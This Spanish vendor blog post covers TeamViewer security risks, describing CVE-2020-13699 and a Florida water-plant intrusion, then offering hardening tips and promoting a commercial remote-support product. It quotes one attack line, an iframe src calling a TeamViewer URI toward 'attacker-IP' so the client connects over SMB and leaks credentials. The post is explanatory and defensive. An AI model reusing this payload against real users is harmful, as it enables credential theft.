Blog Widefense

TeamViewer y los riesgos de ciberseguridad de esta popular herramienta

Escrito por Kenneth Daniels | 08-dic-22

TeamViewer se ha convertido en una de las plataformas más populares por los usuarios para acceder de forma remota a otros dispositivos. De acuerdo al sitio web, cuenta con más de 580 mil clientes alrededor del mundo y 320 millones de dispositivos activos al año. Una cifra que corrobora la aprobación de quienes lo utilizan.

Sin embargo, TeamViewer no es seguro en su totalidad. Al usar esta herramienta, podrías ser víctima de un ataque cibernético, que pondría en riesgo toda la información confidencial que puedes almacenar sobre tu organización y la de tus colaboradores.

Pensando en ello, te informamos acerca de los riesgos de ciberseguridad que debes conocer si usas esta plataforma.

 

¿Qué es TeamViewer?

Es una herramienta de asistencia remota que permite compartir la actividad en la pantalla de un dispositivo con otro usuario que tenga descargado TeamViewer. Lo puedes conectar a computadoras, servidores, Smartphones, dispositivos de loT, entre otros.

Su popularidad en las organizaciones se debe a la facilidad de brindar soporte técnico vía remota con un especialista, compartir información confidencial entre usuarios, organizar reuniones laborales, grabar sesiones para quienes no estuvieron presentes, supervisión de proyectos en la empresa, entre otros.

 

Riesgos de ciberseguridad en TeamViewer

TeamViewer presenta un fallo que pone en peligro la información confidencial de organizaciones y colaboradores. Este error permite que un intruso pueda acceder a cualquier equipo de escritorio sin ser notificado y realice diferentes tipos de ataques como robo de información, suplantación, entre otros. La vulnerabilidad se ha denominado como CVE-2020-13699 y ha sido considerado de alto peligro.

Para que un computador pueda ser vulnerable al ataque, el cracker debe redirigir al usuario a un sitio web malicioso, presente en versiones antiguas de TeamViewer. Una vez logrado, el atacante usaría un atributo src del iframe en ‘teamviewer 10: –play attacker-IP share fake.tvs’. Al realizarlo, permite que TeamViewer se conecte al dispositivo del cracker mediante un SMB, obteniendo el dominio del computador de la víctima.

A principios de marzo, fue descubierto un ciberataque que intentaba modificar el sistema para tratamiento del agua en una planta potabilizadora en Florida, Estados Unidos. Al parecer, el pirata informático logró acceder a una de las computadoras a través de la herramienta para el acceso remoto TeamViewer, que era utilizada por los operadores de esta planta, que suministra agua potable a unos 15.000 habitantes, para resolver problemas de forma remota o con el propósito de monitorear los sistemas.

 

Recomendaciones al usar TeamViewer

Como organización es importante proteger la información confidencial que almacenas en tus dispositivos. En Widefense, te brindamos algunas recomendaciones que puedes implementar si no deseas ser víctima de un ataque cibernético.

 

1. Actualiza la última versión de TeamViewer

Debido a las amenazas que se presentan en la plataforma, TeamViewer constantemente realiza renovaciones para que sus usuarios no sean víctimas de la ciberdelincuencia. Te recomendamos que actualices a la última versión que presenta la herramienta, así evitarás que un atacante entre a tu dispositivo.

 

2. Utiliza contraseñas seguras

TeamViewer presenta un sistema con contraseñas aleatorias de 4 a 6 dígitos. Al ser de pocos caracteres es fácil de descifrar por los crackers. Te mostramos una alternativa que te brindará mayor seguridad si deseas compartir información con otro usuario. Conecta el dispositivo con tu cuenta y crea tu propia contraseña a través del menú que presenta esta herramienta.
 

3. Activa la verificación en dos pasos

Una manera para evitar ser víctima de algún cracker, es la opción de activar la verificación en dos pasos. Al realizarlo, el sistema te pedirá un código de verificación que es enviado a tu móvil al iniciar sesión. Para configurarlo, puedes hacerlo en la opción de editar tu perfil en TeamViewer y listo.

 

4. Configurar una lista blanca de accesos

Esta lista permitirá configurar las conexiones a dispositivos asociados a la cuenta, de forma que solo las cuentas seleccionadas puedan acceder, de manera de negar acceso a los dispositivos extraños, aun contando con el ID y contraseña del equipo.

 

Soluciones con Widefense

En Widefense contamos con soluciones de última generación que te pueden ayudar a mantener los dispositivos electrónicos de todo el equipo de tu organización de forma segura.

 

BeyondTrust Remote Support:

 

La solución número uno para que las empresas líderes accedan y brinden soporte de manera segura a cualquier dispositivo o sistema, desde cualquier parte del mundo. Funciona a través de firewalls sin túnel VPN, por lo que la seguridad puede permanecer intacta. Todo el tráfico de sesión y los datos en tránsito están encriptados, y se registra cada sesión remota para un seguimiento de auditoría detallado

 

Conéctate sin miedo

Vive la ciberseguridad sin miedo. Conversa con uno de nuestros especialistas de ciberseguridad en contacto@widefense.com, agenda una asesoría en Chile +56 9 7569 9259 o Colombia +57 3155 097 765 o escríbenos vía WhatsApp.